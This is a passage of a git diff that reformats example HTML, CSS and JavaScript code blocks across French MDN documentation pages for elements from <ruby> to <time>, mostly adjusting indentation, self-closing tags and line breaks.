@@ -20,10 +20,8 @@ Cet élément peut utiliser [les attributs universels](/fr/docs/Web/HTML/Attribu
 
 ```html
 <ruby>
-   <rb>旧</rb> <rt>jiù</rt>
-   <rb>金</rb> <rt>jīn</rt>
-   <rb>山</rb> <rt>shān</rt>
-   <rtc>San Francisco</rtc>
+  <rb>旧</rb> <rt>jiù</rt> <rb>金</rb> <rt>jīn</rt> <rb>山</rb> <rt>shān</rt>
+  <rtc>San Francisco</rtc>
 </ruby>
 ```
 

--- a/files/fr/web/html/element/ruby/index.md
+++ b/files/fr/web/html/element/ruby/index.md
@@ -22,8 +22,7 @@ Cet élément inclut uniquement les [attributs globaux](/fr/docs/Web/HTML/Global
 
 ```html
 <ruby>
-  漢 <rp>(</rp><rt>Kan</rt><rp>)</rp>
-  字 <rp>(</rp><rt>ji</rt><rp>)</rp>
+  漢 <rp>(</rp><rt>Kan</rt><rp>)</rp> 字 <rp>(</rp><rt>ji</rt><rp>)</rp>
 </ruby>
 ```
 
@@ -36,9 +35,7 @@ Cet élément inclut uniquement les [attributs globaux](/fr/docs/Web/HTML/Global
 #### HTML
 
 ```html
-<ruby>
-  明日 <rp>(</rp><rt>Ashita</rt><rp>)</rp>
-</ruby>
+<ruby> 明日 <rp>(</rp><rt>Ashita</rt><rp>)</rp> </ruby>
 ```
 
 #### Résultat

--- a/files/fr/web/html/element/s/index.md
+++ b/files/fr/web/html/element/s/index.md
@@ -19,9 +19,7 @@ Cet élément inclut uniquement [les attributs universels](/fr/docs/Web/HTML/Att
 ### HTML
 
 ```html
-<p>
-  <s>Le plat du jour : saumon à la hollandaise</s> <em>plus disponible</em>
-</p>
+<p><s>Le plat du jour : saumon à la hollandaise</s> <em>plus disponible</em></p>
 ```
 
 ### Résultat

--- a/files/fr/web/html/element/samp/index.md
+++ b/files/fr/web/html/element/samp/index.md
@@ -7,7 +7,7 @@ l10n:
 
 {{HTMLSidebar}}
 
-L'élément [HTML](/fr/docs/Web/HTML) **`<samp>`** est un élément qui permet de représenter un résultat produit par un programme informatique en incise dans du texte. Il est généralement affiché avec la police à chasse fixe du navigateur (par exemple en [Courier](https://fr.wikipedia.org/wiki/Courier_(police_d%27écriture)) ou en Lucida Console).
+L'élément [HTML](/fr/docs/Web/HTML) **`<samp>`** est un élément qui permet de représenter un résultat produit par un programme informatique en incise dans du texte. Il est généralement affiché avec la police à chasse fixe du navigateur (par exemple en [Courier](<https://fr.wikipedia.org/wiki/Courier_(police_d'écriture)>) ou en Lucida Console).
 
 {{EmbedInteractiveExample("pages/tabbed/samp.html", "tabbed-shorter")}}
 
@@ -80,8 +80,8 @@ Dans cet exemple simple, un paragraphe contient une mention d'un résultat d'un 
 ```html
 <p>
   Lorsque le traitement est terminé, l'outil affichera le texte
-  <samp>Scan terminé. <em>N</em> résultats trouvés</samp>. Vous
-  pourrez alors passer à l'étape suivante.
+  <samp>Scan terminé. <em>N</em> résultats trouvés</samp>. Vous pourrez alors
+  passer à l'étape suivante.
 </p>
 ```
 

--- a/files/fr/web/html/element/select/index.md
+++ b/files/fr/web/html/element/select/index.md
@@ -77,7 +77,8 @@ Pour plus d'informations sur la mise en forme de `<select>` :
 L'exemple qui suit est légèrement plus complexe et illustre certaines fonctionnalités qui peuvent être utilisées avec un élément `<select>` :
 
 ```html
-<label>Veuillez choisir un ou plusieurs animaux :
+<label
+  >Veuillez choisir un ou plusieurs animaux :
   <select name="pets" multiple size="4">
     <optgroup label="Animaux à 4-jambes">
       <option value="Chien">Chien</option>

--- a/files/fr/web/html/element/slot/index.md
+++ b/files/fr/web/html/element/slot/index.md
@@ -23,8 +23,14 @@ Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Attributs_univ
 ```html
 <template id="element-details-template">
   <style>
-    details {font-family: "Open Sans Light", Helvetica, Arial, sans-serif }
-    .name {font-weight: bold; color: #217ac0; font-size: 120% }
+    details {
+      font-family: "Open Sans Light", Helvetica, Arial, sans-serif;
+    }
+    .name {
+      font-weight: bold;
+      color: #217ac0;
+      font-size: 120%;
+    }
     h4 {
       margin: 10px 0 -8px 0;
       background: #217ac0;
@@ -33,20 +39,30 @@ Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Attributs_univ
       border: 1px solid #cee9f9;
       border-radius: 4px;
     }
-    .attributes { margin-left: 22px; font-size: 90% }
-    .attributes p { margin-left: 16px; font-style: italic }
+    .attributes {
+      margin-left: 22px;
+      font-size: 90%;
+    }
+    .attributes p {
+      margin-left: 16px;
+      font-style: italic;
+    }
   </style>
   <details>
     <summary>
-      <code class="name">&lt;<slot name="element-name">Remplacer ce nom</slot>&gt;</code>
-      <i class="desc"><slot name="description">Remplacer cette description</slot></i>
+      <code class="name"
+        >&lt;<slot name="element-name">Remplacer ce nom</slot>&gt;</code
+      >
+      <i class="desc"
+        ><slot name="description">Remplacer cette description</slot></i
+      >
     </summary>
     <div class="attributes">
       <h4>Attributs</h4>
       <slot name="attributes"><p>Aucun</p></slot>
     </div>
   </details>
-  <hr>
+  <hr />
 </template>
 ```
 

--- a/files/fr/web/html/element/small/index.md
+++ b/files/fr/web/html/element/small/index.md
@@ -20,9 +20,8 @@ Cet élément inclut uniquement [les attributs universels](/fr/docs/Web/HTML/Att
 
 ```html
 <p>
-   Voici une phrase avant des infos à
-   présenter en plus petit.
-   <small>© tous droits réservés</small>
+  Voici une phrase avant des infos à présenter en plus petit.
+  <small>© tous droits réservés</small>
 </p>
 ```
 

--- a/files/fr/web/html/element/source/index.md
+++ b/files/fr/web/html/element/source/index.md
@@ -48,9 +48,9 @@ Dans cet exemple, on voit comment distribuer une vidéo au format Ogg pour les n
 
 ```html
 <video controls>
-  <source src="toto.webm" type="video/webm">
-  <source src="toto.ogg" type="video/ogg">
-  <source src="toto.mov" type="video/quicktime">
+  <source src="toto.webm" type="video/webm" />
+  <source src="toto.ogg" type="video/ogg" />
+  <source src="toto.mov" type="video/quicktime" />
   Votre navigateur ne prend pas en charge audio ou video.
 </video>
 ```
@@ -61,9 +61,9 @@ Pour plus d'exemples, se référer à [Manipuler les éléments `<audio>` et `<v
 
 ```html
 <picture>
-   <source srcset="mdn-logo-wide.png" media="(min-width: 800px)">
-   <source srcset="mdn-logo-medium.png" media="(min-width: 600px)">
-   <img src="mdn-logo-narrow.png" alt="MDN">
+  <source srcset="mdn-logo-wide.png" media="(min-width: 800px)" />
+  <source srcset="mdn-logo-medium.png" media="(min-width: 600px)" />
+  <img src="mdn-logo-narrow.png" alt="MDN" />
 </picture>
 ```
 

--- a/files/fr/web/html/element/strike/index.md
+++ b/files/fr/web/html/element/strike/index.md
@@ -23,10 +23,7 @@ Cet élément implémente l'interface {{domxref("HTMLElement")}}.
 ## Exemples
 
 ```html
-<strike>
-  Plat du jour : Saumon
-</strike>
-ÉPUISÉ
+<strike> Plat du jour : Saumon </strike> ÉPUISÉ
 ```
 
 ### Résultat

--- a/files/fr/web/html/element/strong/index.md
+++ b/files/fr/web/html/element/strong/index.md
@@ -41,8 +41,7 @@ En HTML 4, `<strong>` indiquait simplement une emphase plus forte. En HTML5, l'�
 ```html
 <p>
   Avant de faire le truc X il est
-  <strong>nécessaire</strong> de
-  faire le truc Y avant.
+  <strong>nécessaire</strong> de faire le truc Y avant.
 </p>
 ```
 

--- a/files/fr/web/html/element/style/index.md
+++ b/files/fr/web/html/element/style/index.md
@@ -43,16 +43,16 @@ Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Attributs_univ
 ```html
 <!doctype html>
 <html>
-<head>
-  <style>
-    p {
-      color: red;
-    }
-  </style>
-</head>
-<body>
-  <p>Voici un paragraphe.</p>
-</body>
+  <head>
+    <style>
+      p {
+        color: red;
+      }
+    </style>
+  </head>
+  <body>
+    <p>Voici un paragraphe.</p>
+  </body>
 </html>
 ```
 
@@ -69,25 +69,25 @@ Dans cet exemple, on utilise deux éléments `<style>`, on peut voir comment les
 ```html
 <!doctype html>
 <html>
-<head>
-  <style>
-    p {
-      color: white;
-      background-color: blue;
-      padding: 5px;
-      border: 1px solid black;
-    }
-  </style>
-  <style>
-    p {
-      color: blue;
-      background-color: yellow;
-    }
-  </style>
-</head>
-<body>
-  <p>Voici un paragraphe.</p>
-</body>
+  <head>
+    <style>
+      p {
+        color: white;
+        background-color: blue;
+        padding: 5px;
+        border: 1px solid black;
+      }
+    </style>
+    <style>
+      p {
+        color: blue;
+        background-color: yellow;
+      }
+    </style>
+  </head>
+  <body>
+    <p>Voici un paragraphe.</p>
+  </body>
 </html>
 ```
 
@@ -104,25 +104,25 @@ Dans cet exemple (basé sur le précédent), on ajoute un attribut `media` sur l
 ```html
 <!doctype html>
 <html>
-<head>
-  <style>
-    p {
-      color: white;
-      background-color: blue;
-      padding: 5px;
-      border: 1px solid black;
-    }
-  </style>
-  <style media="all and (max-width: 500px)">
-    p {
-      color: blue;
-      background-color: yellow;
-    }
-  </style>
-</head>
-<body>
-  <p>Voici un paragraphe.</p>
-</body>
+  <head>
+    <style>
+      p {
+        color: white;
+        background-color: blue;
+        padding: 5px;
+        border: 1px solid black;
+      }
+    </style>
+    <style media="all and (max-width: 500px)">
+      p {
+        color: blue;
+        background-color: yellow;
+      }
+    </style>
+  </head>
+  <body>
+    <p>Voici un paragraphe.</p>
+  </body>
 </html>
 ```
 

--- a/files/fr/web/html/element/sub/index.md
+++ b/files/fr/web/html/element/sub/index.md
@@ -77,9 +77,8 @@ Voici certains cas d'utilisation (non exhaustifs) pour `<sub>`&nbsp;:
 
 ```html
 <p>
-  Selon les calculs effectués par Nakamura, Johnson et
-  Mason<sub>1</sub>, cela causera l'annulation complète
-  des deux particules.
+  Selon les calculs effectués par Nakamura, Johnson et Mason<sub>1</sub>, cela
+  causera l'annulation complète des deux particules.
 </p>
 ```
 
@@ -92,9 +91,7 @@ Voici certains cas d'utilisation (non exhaustifs) pour `<sub>`&nbsp;:
 #### HTML
 
 ```html
-<p>
-  La molécule d'eau est symbolisée par H<sub>2</sub>O.
-</p>
+<p>La molécule d'eau est symbolisée par H<sub>2</sub>O.</p>
 ```
 
 #### Résultat

--- a/files/fr/web/html/element/summary/index.md
+++ b/files/fr/web/html/element/summary/index.md
@@ -41,8 +41,7 @@ Voir la section ci-après sur la compatibilité des navigateurs à ce sujet car 
 ```html
 <details open>
   <summary>Détails produit</summary>
-  <p>Ce produit a été fabriqué par
-  ACME et respecte les pandas.</p>
+  <p>Ce produit a été fabriqué par ACME et respecte les pandas.</p>
 </details>
 ```
 

--- a/files/fr/web/html/element/sup/index.md
+++ b/files/fr/web/html/element/sup/index.md
@@ -49,10 +49,7 @@ Voici quelques cas d'utilisation (non exhaustifs) pour `<sup>` :
 #### HTML
 
 ```html
-<p>
-  Voici la fonction exponentielle :
-  e<sup>x</sup>.
-</p>
+<p>Voici la fonction exponentielle : e<sup>x</sup>.</p>
 ```
 
 #### Résultat
@@ -66,9 +63,7 @@ Bien que, techniquement, le lettrage supérieur ne corresponde pas à la mise en
 #### HTML
 
 ```html
-<p>
-  Robert a présenté son rapport à M<sup>lle</sup> Bernard.
-</p>
+<p>Robert a présenté son rapport à M<sup>lle</sup> Bernard.</p>
 ```
 
 #### Résultat
@@ -81,8 +76,7 @@ Bien que, techniquement, le lettrage supérieur ne corresponde pas à la mise en
 
 ```html
 <p>
-  Voici comment le nombre ordinal cinquième est écrit dans
-  différentes langues
+  Voici comment le nombre ordinal cinquième est écrit dans différentes langues
 </p>
 <ul>
   <li>en français : 5<sup>e</sup></li>

--- a/files/fr/web/html/element/table/index.md
+++ b/files/fr/web/html/element/table/index.md
@@ -195,8 +195,8 @@ Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Attributs_univ
 <!-- Tableau utilisant colgroup et col -->
 <table>
   <colgroup>
-    <col class="column1">
-    <col class="columns2plus3" span="2">
+    <col class="column1" />
+    <col class="columns2plus3" span="2" />
   </colgroup>
   <tr>
     <th>Citron vert</th>
@@ -212,7 +212,9 @@ Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Attributs_univ
 
 <!-- Tableau simple avec une légende -->
 <table>
-  <caption>Super légende</caption>
+  <caption>
+    Super légende
+  </caption>
   <tr>
     <td>Données géniales</td>
   </tr>
@@ -242,7 +244,9 @@ L'attribut [`scope`](/fr/docs/Web/HTML/Element/th#scope) peut être redondant da
 
 ```html
 <table>
-  <caption>Noms et valeurs des couleurs</caption>
+  <caption>
+    Noms et valeurs des couleurs
+  </caption>
   <tbody>
     <tr>
       <th scope="col">Nom</th>

--- a/files/fr/web/html/element/tbody/index.md
+++ b/files/fr/web/html/element/tbody/index.md
@@ -89,6 +89,7 @@ Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Global_attribu
 - `charoff` {{deprecated_inline}}
   - : Cet attribut est utilisé pour indiquer le décalage, en nombre de caractères, depuis le caractère définit par l'attribut `char` à appliquer au contenu des cellules.
 - `valign` {{deprecated_inline}}
+
   - : Cet attribut définit l'alignement vertical du texte des cellules de la colonne. Les valeurs possibles de cet attribut sont&nbsp;:
 
     - `baseline`
@@ -159,14 +160,19 @@ Le CSS permettant la mise en forme du tableau se décompose comme suit&nbsp;:
 table {
   border: 2px solid #555;
   border-collapse: collapse;
-  font: 16px "Lucida Grande", "Helvetica", "Arial", sans-serif;
+  font:
+    16px "Lucida Grande",
+    "Helvetica",
+    "Arial",
+    sans-serif;
 }
 ```
 
 Pour commencer, on définit le style général du tableau, l'épaisseur, le style et la couleur de la bordure extérieure avec [`border-collapse`](/fr/docs/Web/CSS/border-collapse) pour s'assurer que les lignes de bordure sont partagées entre les cellules adjacentes plutôt que chacune ait ses propres bordures avec un espace interstitiel. [`font`](/fr/docs/Web/CSS/font) est utilisé pour définir une police de caractères pour les textes du tableau.
 
 ```css
-th, td {
+th,
+td {
   border: 1px solid #bbb;
   padding: 2px 8px 0;
   text-align: left;
@@ -267,10 +273,15 @@ Puis, chaque ligne suivante pour ce `<tbody>` se compose de deux cellules&nbsp;:
 table {
   border: 2px solid #555;
   border-collapse: collapse;
-  font: 16px "Lucida Grande", "Helvetica", "Arial", sans-serif;
+  font:
+    16px "Lucida Grande",
+    "Helvetica",
+    "Arial",
+    sans-serif;
 }
 
-th, td {
+th,
+td {
   border: 1px solid #bbb;
   padding: 2px 8px 0;
   text-align: left;

--- a/files/fr/web/html/element/td/index.md
+++ b/files/fr/web/html/element/td/index.md
@@ -56,9 +56,11 @@ L'élément [HTML](/fr/docs/Web/HTML) **`<td>`** définit une cellule d'un table
 Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Global_attributes).
 
 - `colspan`
+
   - : Cet attribut contient un entier positif indiquant le nombre de colonnes sur lesquelles s'étend la cellule. La valeur par défaut est 1. Des valeurs supérieures à 1000 peuvent être considérées comme incorrectes et seront interprétées comme valant la valeur par défaut (1).
 
 - `headers`
+
   - : Cet attribut est une liste de chaînes de caractères séparées par des espaces. Chacune correspond à l'attribut `id` de l'élément [`<th>`](/fr/docs/Web/HTML/Element/th) qui s'applique à la cellule courante.
 
 - `rowspan`
@@ -67,11 +69,13 @@ Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Global_attribu
 ### Attributs dépréciés
 
 - `abbr` {{deprecated_inline}}
+
   - : Cet attribut contient une description courte et abrégée du contenu de la cellule. Certains outils utilisateurs, comme la synthèse vocale, peuvent décrire cette information avant le contenu lui-même.
 
     > **Note :** Cet attribut est obsolète dans le dernier standard et ne doit donc plus être utilisé. Il faut dans ces cas introduire la description au sein de la cellule comme un élément [`<abbr>`](/fr/docs/Web/HTML/Element/abbr) indépendant ou utiliser l'attribut `title` de la cellule pour représenter le contenu et la cellule elle-même pour représenter le contenu abrégé.
 
 - `align` {{deprecated_inline}}
+
   - : Cet attribut à valeurs définit l'alignement horizontal pour le contenu de chaque cellule de la colonne. Les valeurs possibles sont&nbsp;:
 
     - `left`
@@ -93,26 +97,33 @@ Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Global_attribu
     > - Pour réaliser le même effet qu'avec la valeur `char`. Il est possible, en CSS3, d'utiliser la valeur de l'attribut `char` comme valeur de la propriété [`text-align`](/fr/docs/Web/CSS/text-align) (non implémenté à date).
 
 - `axis` {{deprecated_inline}}
+
   - : Cet attribut contient une liste de chaînes de caractères (séparées par des espaces). Chaque chaîne de caractère est l'identifiant d'un groupe de cellule auquel cet en-tête s'applique.
 
 - `bgcolor` {{Non-standard_inline}}
+
   - : Cet attribut définit la couleur d'arrière-plan de chaque cellule dans une colonne. Sa valeur est [un code hexadécimal RGB sur 6 chiffres](/fr/docs/Web/CSS/color_value#les_couleurs_rgb), préfixé d'un '`#`' ou un des [mots-clés de couleurs prédéfinis](/fr/docs/Web/CSS/color_value#les_mots-clés).
 
     Pour réaliser un effet équivalent, on utilisera plutôt la propriété CSS [`background-color`](/fr/docs/Web/CSS/background-color).
 
 - `char` {{deprecated_inline}}
+
   - : Cet attribut est utilisé pour définir le caractère sur lequel aligner les cellules d'une colonne. Les valeurs de cet attribut contiennent généralement un point (.) pour aligner des nombres ou des valeurs monétaires. Si l'attribut `align` ne vaut pas `char`, l'attribut est ignoré.
 
 - `charoff` {{deprecated_inline}}
+
   - : Cet attribut est utilisé pour indiquer le décalage, en nombre de caractères, depuis le caractère défini par l'attribut `char` à appliquer au contenu des cellules.
 
 - `height` {{deprecated_inline}}
+
   - : Cet attribut définit une hauteur de cellule recommandée. On utilisera plutôt la propriété CSS [`height`](/fr/docs/Web/CSS/height).
 
 - `scope` {{deprecated_inline}}
+
   - : Cet attribut à valeurs énumérées définit les cellules qui sont liées à l'en-tête défini par l'élément [`<th>`](/fr/docs/Web/HTML/Element/th). À utiliser uniquement avec l'élément `<th>` pour définir la ligne ou la colonne pour laquelle il est son en-tête.
 
 - `valign` {{deprecated_inline}}
+
   - : Cet attribut définit l'alignement vertical du texte des cellules de la colonne. Les valeurs possibles de cet attribut sont&nbsp;:
 
     - `baseline`

--- a/files/fr/web/html/element/template/index.md
+++ b/files/fr/web/html/element/template/index.md
@@ -50,7 +50,6 @@ Avec le tableau créé et le template défini, on utilise JavaScript pour insér
 // l'élément HTML template en vérifiant la présence
 // de l'attribut content pour l'élément template.
 if ("content" in document.createElement("template")) {
-
   // On prépare une ligne pour le tableau
   var template = document.querySelector("#productrow");
 
@@ -71,7 +70,6 @@ if ("content" in document.createElement("template")) {
 
   // Puis on insère
   tbody.appendChild(clone2);
-
 } else {
   // Une autre méthode pour ajouter les lignes
   // car l'élément HTML n'est pas pris en charge.

--- a/files/fr/web/html/element/textarea/index.md
+++ b/files/fr/web/html/element/textarea/index.md
@@ -91,7 +91,7 @@ La spécification HTML ne définit pas l'emplacement de la ligne de base pour un
 
 Dans la plupart des navigateurs, il est possible de redimensionner les éléments `<textarea>` grâce au coin inférieur droit. Pour désactiver ce redimensionnement, on peut utiliser la propriété CSS {{cssxref("resize")}} avec la valeur `none` :
 
-```html
+```css
 textarea {
   resize: none;
 }
@@ -118,8 +118,7 @@ textarea:valid {
 L'exemple qui suit illustre une configuration simple avec un nombre donné de lignes et de colonnes et affiche un contenu par défaut.
 
 ```html
-<textarea name="textarea"
-   rows="10" cols="50">Vous pouvez écrire ici.</textarea>
+<textarea name="textarea" rows="10" cols="50">Vous pouvez écrire ici.</textarea>
 ```
 
 #### Résultat
@@ -131,9 +130,9 @@ L'exemple qui suit illustre une configuration simple avec un nombre donné de li
 Cet exemple fixe un nombre de caractère minimal et maximal. Vous pouvez essayer de saisir un texte de moins de 10 caractères ou de plus de 30 caractères.
 
 ```html
-<textarea name="textarea"
-   rows="5" cols="30"
-   minlength="10" maxlength="30">Vous pouvez écrire ici.</textarea>
+<textarea name="textarea" rows="5" cols="30" minlength="10" maxlength="30">
+Vous pouvez écrire ici.</textarea
+>
 ```
 
 #### Résultat
@@ -147,9 +146,11 @@ On notera que `minlength` n'empêche pas de retirer des caractères afin de réd
 Dans cet exemple, on utilise l'attribut `placeholder` afin d'afficher une indication qui disparaît dès qu'on saisit quelque chose dans la zone.
 
 ```html
-<textarea name="textarea"
-   rows="5" cols="30"
-   placeholder="Voici une indication."></textarea>
+<textarea
+  name="textarea"
+  rows="5"
+  cols="30"
+  placeholder="Voici une indication."></textarea>
 ```
 
 #### Résultat
@@ -163,12 +164,12 @@ Dans cet exemple, on utilise l'attribut `placeholder` afin d'afficher une indica
 Cet exemple affiche deux éléments `<textarea>` : le premier est désactivé avec `disabled` et le second est en lecture seule avec `readonly`. Vous pouvez les manipuler pour voir les différences : pour le premier, on ne peut pas sélectionné son contenu et la valeur n'est pas envoyée avec le formulaire ; pour le second, le contenu peut être sélectionné et la valeur est envoyée, il est uniquement impossible d'éditer le contenu.
 
 ```html
-<textarea name="textarea"
-   rows="5" cols="30"
-   disabled>Je suis désactivé</textarea>
-<textarea name="textarea"
-   rows="5" cols="30"
-   readonly>Je suis en lecture seule</textarea>
+<textarea name="textarea" rows="5" cols="30" disabled>
+Je suis désactivé</textarea
+>
+<textarea name="textarea" rows="5" cols="30" readonly>
+Je suis en lecture seule</textarea
+>
 ```
 
 #### Résultat

--- a/files/fr/web/html/element/tfoot/index.md
+++ b/files/fr/web/html/element/tfoot/index.md
@@ -60,6 +60,7 @@ Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Global_attribu
 Les attributs qui suivent sont dépréciés et ne devraient pas être utilisés. Ils sont uniquement documentés à des fins historiques et pour la mise à jour du code existant qui les utiliserait.
 
 - `align` {{Deprecated_inline}}
+
   - : Cet attribut à valeurs définit l'alignement horizontal pour le contenu de chaque cellule de la colonne. Les valeurs possibles sont&nbsp;:
 
     - `left`
@@ -86,9 +87,11 @@ Les attributs qui suivent sont dépréciés et ne devraient pas être utilisés.
     Pour réaliser un effet équivalent, on utilisera plutôt la propriété CSS [`background-color`](/fr/docs/Web/CSS/background-color).
 
 - `char` {{Deprecated_inline}}
+
   - : Cet attribut est utilisé pour définir le caractère sur lequel aligner les cellules d'une colonne. Les valeurs de cet attribut contiennent généralement un point (.) pour aligner des nombres ou des valeurs monétaires. Si l'attribut `align` ne vaut pas `char`, l'attribut est ignoré.
 
 - `charoff` {{Deprecated_inline}}
+
   - : Cet attribut est utilisé pour indiquer le décalage, en nombre de caractères, depuis le caractère définit par l'attribut `char` à appliquer au contenu des cellules.
 
 - `valign` {{Deprecated_inline}}

--- a/files/fr/web/html/element/th/index.md
+++ b/files/fr/web/html/element/th/index.md
@@ -56,18 +56,23 @@ L'élément HTML **`<th>`** définit une cellule d'un tableau comme une cellule 
 Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Global_attributes).
 
 - `abbr`
+
   - : Cet attribut contient une description courte et abrégée du contenu de la cellule. Certains outils utilisateurs, comme la synthèse vocale, peuvent décrire cette information avant le contenu lui-même.
 
 - `colspan`
+
   - : Cet attribut contient un entier positif indiquant le nombre de colonnes sur lesquelles s'étend la cellule. La valeur par défaut est 1. Des valeurs supérieures à 1000 peuvent être considérées comme incorrectes et seront corrigées avec la valeur par défaut.
 
 - `headers`
+
   - : Cet attribut est une liste de chaînes de caractères séparées par des espaces. Chacune correspond à l'attribut `id` de l'élément `<th>` qui s'applique à cet élément.
 
 - `rowspan`
+
   - : Cet attribut contient un entier positif indiquant sur combien de lignes s'étend la cellule. La valeur par défaut est 1. Si cet attribut vaut 0, la cellule s'étend jusqu'à la fin de la section ([`<thead>`](/fr/docs/Web/HTML/Element/thead), [`<tbody>`](/fr/docs/Web/HTML/Element/tbody), [`<tfoot>`](/fr/docs/Web/HTML/Element/tfoot)) du tableau à laquelle appartient la cellule même si cette section est définie implicitement. Les valeurs supérieures à 65534 seront ramenées à 65534.
 
 - `scope`
+
   - : Cet attribut référence les cellules auxquelles l'élément `<th>` est lié. Cet attribut peut prendre l'une des valeurs suivantes&nbsp;:
 
     - `row`
@@ -84,6 +89,7 @@ Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Global_attribu
 ### Attributs dépréciés
 
 - `align` {{deprecated_inline}}
+
   - : Cet attribut définit l'alignement horizontal pour le contenu de chaque cellule de la colonne. Les valeurs possibles sont&nbsp;:
 
     - `left`
@@ -105,31 +111,37 @@ Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Global_attribu
     > - Pour réaliser le même effet qu'avec la valeur `char`. Il est possible d'utiliser la valeur de l'attribut `char` comme valeur de la propriété [`text-align`](/fr/docs/Web/CSS/text-align).
 
 - `axis` {{deprecated_inline}}
+
   - : Cet attribut contient une liste de chaînes de caractères (séparées par des espaces). Chaque chaîne de caractère est l'identifiant d'un groupe de cellule auquel cet en-tête s'applique.
 
     > **Note :** Cet attribut est obsolète dans le dernier standard et ne doit donc plus être utilisé. L'attribut `scope` doit être utilisé pour le remplacer.
 
 - `bgcolor` {{Non-standard_inline}}
+
   - : Cet attribut définit la couleur d'arrière-plan de chaque cellule dans une colonne. Sa valeur est [un code hexadécimal RGB sur 6 chiffres](/fr/docs/Web/CSS/color_value#les_couleurs_rgb), préfixé d'un '`#`' ou un des [mots-clés de couleurs prédéfinis](/fr/docs/Web/CSS/color_value#les_mots-clés).
 
     Pour réaliser un effet équivalent, on utilisera plutôt la propriété CSS [`background-color`](/fr/docs/Web/CSS/background-color).
 
 - `char` {{deprecated_inline}}
+
   - : Cet attribut est utilisé pour définir le caractère sur lequel aligner les cellules d'une colonne. Les valeurs de cet attribut contiennent généralement un point (.) pour aligner des nombres ou des valeurs monétaires. Si l'attribut `align` ne vaut pas `char`, l'attribut est ignoré.
 
     > **Note :** Cet attribut est obsolète et il est donc fortement déconseillé de l'utiliser. De fait, il n'est pas supporté par le dernier standard. Pour réaliser le même effet qu'avec `char`, on peut utiliser la même valeur sur la propriété CSS [`text-align`](/fr/docs/Web/CSS/text-align).
 
 - `charoff` {{deprecated_inline}}
+
   - : Cet attribut est utilisé pour indiquer le décalage, en nombre de caractères, depuis le caractère défini par l'attribut `char` à appliquer au contenu des cellules.
 
     > **Note :** Cet attribut ne doit plus être utilisé, car il est maintenant obsolète.
 
 - `height` {{deprecated_inline}}
+
   - : Cet attribut est utilisé afin de définir une hauteur recommandée pour la cellule.
 
     > **Note :** Cet attribut est désormais obsolète. On utilisera plutôt la propriété CSS [`height`](/fr/docs/Web/CSS/height) à la place.
 
 - `valign` {{Deprecated_inline}}
+
   - : Cet attribut définit l'alignement vertical du texte des cellules de la colonne. Les valeurs possibles pour cet attribut sont&nbsp;:
 
     - `baseline`
@@ -144,6 +156,7 @@ Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Global_attribu
     > **Note :** Cet attribut est obsolète dans le dernier standard, la propriété CSS [`vertical-align`](/fr/docs/Web/CSS/vertical-align) doit être utilisée à la place.
 
 - `width` {{deprecated_inline}}
+
   - : Cet attribut est utilisé afin de définir une largeur de cellule recommandée. Un espace supplémentaire peut être ajouté via les propriétés [`cellspacing`](/fr/docs/Web/API/HTMLTableElement/cellSpacing) et [`cellpadding`](/fr/docs/Web/API/HTMLTableElement/cellPadding) et en modifiant la largeur de l'élément [`<col>`](/fr/docs/Web/HTML/Element/col). Si la largeur de la colonne est trop étroite pour afficher une cellule donnée correctement, elle sera élargie lors de l'affichage.
 
     > **Note :** Cet attribut est désormais obsolète et il faut donc éviter de l'utiliser. On utilisera plutôt la propriété CSS [`width`](/fr/docs/Web/CSS/width) à la place.

--- a/files/fr/web/html/element/thead/index.md
+++ b/files/fr/web/html/element/thead/index.md
@@ -58,6 +58,7 @@ Comme tous les autres éléments HTML, cet élément inclut [les attributs unive
 ### Attributs dépréciés ou obsolètes
 
 - `align` {{Deprecated_inline}}
+
   - : Cet attribut définit l'alignement horizontal pour le contenu de chaque cellule. Les valeurs possibles sont&nbsp;:
 
     - `left`
@@ -79,21 +80,25 @@ Comme tous les autres éléments HTML, cet élément inclut [les attributs unive
     > - Pour réaliser le même effet qu'avec `char`, vous pouvez utiliser la valeur de `char` comme valeur pour la propriété [`text-align`](/fr/docs/Web/CSS/text-align).
 
 - `bgcolor` {{Non-standard_inline}}
+
   - : Cet attribut définit la couleur d'arrière-plan de chaque cellule dans une colonne. Sa valeur est [un code hexadécimal RGB sur 6 chiffres](/fr/docs/Web/CSS/color_value#les_couleurs_rgb), préfixé d'un '`#`' ou un des [mots-clés de couleurs prédéfinis](/fr/docs/Web/CSS/color_value#les_mots-clés).
 
     Pour réaliser un effet équivalent, on utilisera plutôt la propriété CSS [`background-color`](/fr/docs/Web/CSS/background-color).
 
 - `char` {{Deprecated_inline}}
+
   - : Cet attribut est utilisé pour définir le caractère sur lequel aligner les cellules d'une colonne. Les valeurs de cet attribut contiennent généralement un point (.) pour aligner des nombres ou des valeurs monétaires. Si l'attribut `align` ne vaut pas `char`, l'attribut est ignoré.
 
     > **Note :** Cet attribut est obsolète et il est donc fortement déconseillé de l'utiliser. De fait, il n'est pas supporté par le dernier standard. Pour réaliser le même effet qu'avec `char`, on peut utiliser la même valeur sur la propriété CSS [`text-align`](/fr/docs/Web/CSS/text-align).
 
 - `charoff` {{Deprecated_inline}}
+
   - : Cet attribut est utilisé pour indiquer le décalage, en nombre de caractères, depuis le caractère définit par l'attribut `char` à appliquer au contenu des cellules.
 
     > **Note :** Cet attribut ne doit plus être utilisé, car il est maintenant obsolète et n'est plus supporté dans le dernier standard.
 
 - `valign` {{Deprecated_inline}}
+
   - : Cet attribut définit l'alignement vertical du texte des cellules de la colonne. Les valeurs possibles pour cet attribut sont&nbsp;:
 
     - `baseline`

--- a/files/fr/web/html/element/time/index.md
+++ b/files/fr/web/html/element/time/index.md
@@ -71,8 +71,7 @@ La valeur exploitable informatiquement est la valeur de l'attribut `datetime` de
 #### HTML
 
 ```html
-<p>Le concert a lieu <time
-  datetime="2001-05-15T19:00">le 15 mai</time>.</p>
